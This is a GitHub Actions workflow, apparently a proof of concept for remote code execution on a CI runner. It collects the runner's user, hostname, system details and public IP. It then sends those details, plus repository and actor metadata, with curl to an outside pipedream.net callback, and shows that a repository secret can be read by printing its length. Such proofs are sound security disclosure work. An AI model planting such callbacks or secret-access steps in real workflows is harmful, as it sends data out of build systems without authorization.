name: Run from Docs (PoC)

on:
  workflow_dispatch:
    inputs:
      provider:
        description: "Select cloud provider per the docs"
        required: true
        default: "none"
        type: choice
        options:
          - aws
          - gcp
          - azure
          - none

jobs:
  prove-rce:
    runs-on: ubuntu-latest
    steps:
      - name: Show runner identity (benign)
        run: |
          echo "User: $(whoami)"
          echo "Hostname: $(hostname)"
          echo "Uname: $(uname -a)"
          echo "Runner IP (public): $(curl -s https://ifconfig.me || true)"

      - name: Prove outbound network (benign callback)
        env:
          CALLBACK: "https://eog4wasc32zrjow.m.pipedream.net/rce"
        run: |
          set -euxo pipefail
          # Send minimal, non-sensitive proof:
          who=$(whoami)
          host=$(hostname)
          prov="${{ github.event.inputs.provider }}"
          run_id="${{ github.run_id }}"
          repo="${{ github.repository }}"
          actor="${{ github.actor }}"
          curl -sS "${CALLBACK}?who=${who}&host=${host}&provider=${prov}&run_id=${run_id}&repo=${repo}&actor=${actor}" || true
          echo "Callback sent to canary endpoint."

      - name: Write proof to the GitHub Job Summary
        run: |
          {
            echo "## RCE PoC Proof"
            echo ""
            echo "- **Repository:** ${{ github.repository }}"
            echo "- **Actor:** ${{ github.actor }}"
            echo "- **Run ID:** ${{ github.run_id }}"
            echo "- **Provider input:** ${{ github.event.inputs.provider }}"
            echo ""
            echo "Commands executed successfully on GitHub runner."
          } >> "$GITHUB_STEP_SUMMARY"

      - name: Non-sensitive secrets check (length only)
        if: ${{ env.DEMO_SECRET != '' }}
        env:
          DEMO_SECRET: ${{ secrets.DEMO_SECRET }}  # Create a dummy, non-sensitive secret for demo if allowed
        run: |
          # Don't print secrets; show only the length to prove access is possible
          len=$(printf "%s" "${DEMO_SECRET}" | wc -c | tr -d ' ')
          echo "A demo secret is configured; length=${len} (value redacted)."
